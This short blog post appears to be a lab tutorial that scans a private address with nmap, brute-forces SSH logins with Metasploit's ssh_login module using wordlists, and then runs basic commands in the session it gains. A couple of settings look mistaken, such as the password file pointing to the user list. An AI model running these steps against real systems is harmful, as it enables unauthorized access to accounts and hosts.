Friday, March 29, 2019

Using Metasploit to exploit SSH on target system



looking for open SSH on target system
-nmap -A -Pn 10.0.2.15

found 22/tcp open ssh

- msfconsole
- search ssh_login
- use auxiliary/scanner/ssh/ssh_login
- set RHOSTS 10.0.2.15
- set USER_FILE /root/Desktop/user.txt <- make sure you have one
- set PASS_FILE /root/Desktop/user.txt <- make sure you have one
- set STOP ON SUCCESS true
- set VERBOSE true
- exploit


- sessions

start issuing commands and see what you got

- ls
- whoami
- uname -a

<enjoy>